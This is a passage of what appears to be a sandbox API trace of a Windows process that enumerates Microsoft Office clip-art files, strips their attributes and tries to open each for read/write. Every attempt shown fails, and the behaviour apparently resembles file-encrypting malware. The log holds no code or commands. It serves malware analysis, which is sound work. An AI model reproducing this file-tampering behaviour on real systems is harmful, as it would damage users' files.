(lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.703] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.703] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.704] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0234131.WMF", dwFileAttributes=0x80) returned 0 [0135.704] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0234131.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0234131.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.704] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.704] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.704] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.704] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.704] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0234266.WMF", dwFileAttributes=0x80) returned 0 [0135.704] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0234266.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0234266.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.704] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.704] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.705] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.705] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.705] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0234657.WMF", dwFileAttributes=0x80) returned 0 [0135.705] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0234657.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0234657.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.705] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.706] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.706] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.706] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.706] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0234687.GIF", dwFileAttributes=0x80) returned 0 [0135.706] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0234687.GIF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0234687.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.706] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.706] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.706] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.706] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.706] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0235241.WMF", dwFileAttributes=0x80) returned 0 [0135.706] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0235241.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0235241.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.707] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.707] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.707] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.707] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.707] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0235319.WMF", dwFileAttributes=0x80) returned 0 [0135.707] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0235319.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0235319.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.707] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.707] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.707] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.707] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.707] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0240695.WMF", dwFileAttributes=0x80) returned 0 [0135.708] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0240695.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0240695.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.708] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.708] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.709] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.709] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.709] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0240719.WMF", dwFileAttributes=0x80) returned 0 [0135.709] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0240719.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0240719.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.710] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.710] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.710] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.710] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.710] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0251301.WMF", dwFileAttributes=0x80) returned 0 [0135.710] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0251301.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0251301.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.710] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.710] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.710] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.710] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.710] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0251871.WMF", dwFileAttributes=0x80) returned 0 [0135.711] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0251871.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0251871.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.711] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.711] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.711] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.711] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.711] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0251925.WMF", dwFileAttributes=0x80) returned 0 [0135.712] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0251925.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0251925.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.712] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.712] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.712] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.712] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.712] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0252349.WMF", dwFileAttributes=0x80) returned 0 [0135.712] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0252349.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0252349.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.712] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.712] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.712] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.712] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.713] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0278882.WMF", dwFileAttributes=0x80) returned 0 [0135.713] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0278882.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0278882.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.713] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.713] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.713] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.713] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.713] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0281904.WMF", dwFileAttributes=0x80) returned 0 [0135.713] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0281904.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0281904.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.713] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.713] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.714] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.714] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.714] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0283209.GIF", dwFileAttributes=0x80) returned 0 [0135.714] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0283209.GIF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0283209.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.714] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.714] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.715] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.715] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.715] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0284916.JPG", dwFileAttributes=0x80) returned 0 [0135.715] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0284916.JPG" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0284916.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.715] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.715] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.715] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.715] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.715] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285360.WMF", dwFileAttributes=0x80) returned 0 [0135.715] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285360.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0285360.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.716] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.716] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.716] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.716] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.716] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285410.WMF", dwFileAttributes=0x80) returned 0 [0135.716] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285410.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0285410.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.716] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.716] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.716] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.716] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.716] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285444.WMF", dwFileAttributes=0x80) returned 0 [0135.717] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285444.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0285444.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.717] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.717] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.717] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.717] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.717] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285698.WMF", dwFileAttributes=0x80) returned 0 [0135.718] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285698.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0285698.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.718] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.718] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.718] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.718] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.718] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285750.WMF", dwFileAttributes=0x80) returned 0 [0135.718] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285750.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0285750.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.718] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.718] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.718] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.718] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.719] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285926.WMF", dwFileAttributes=0x80) returned 0 [0135.719] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285926.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0285926.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.719] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.719] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.719] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.719] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.719] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0286034.WMF", dwFileAttributes=0x80) returned 0 [0135.720] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0286034.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0286034.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.720] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.720] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.720] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.720] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.720] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0286068.WMF", dwFileAttributes=0x80) returned 0 [0135.720] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0286068.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0286068.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.720] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.721] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.721] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.721] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.721] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0287005.WMF", dwFileAttributes=0x80) returned 0 [0135.721] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0287005.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0287005.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.721] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.721] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.721] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.721] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.721] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0291984.WMF", dwFileAttributes=0x80) returned 0 [0135.721] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0291984.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0291984.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.722] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.722] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.722] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.722] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.722] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0292020.WMF", dwFileAttributes=0x80) returned 0 [0135.723] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0292020.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0292020.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.723] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.723] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.723] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.723] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.723] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0292152.WMF", dwFileAttributes=0x80) returned 0 [0135.723] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0292152.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0292152.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.723] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.723] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.723] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.723] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.724] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0292982.WMF", dwFileAttributes=0x80) returned 0 [0135.724] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0292982.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0292982.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.724] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.724] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.724] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.724] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.724] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293234.WMF", dwFileAttributes=0x80) returned 0 [0135.724] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293234.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0293234.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.724] CloseHandle 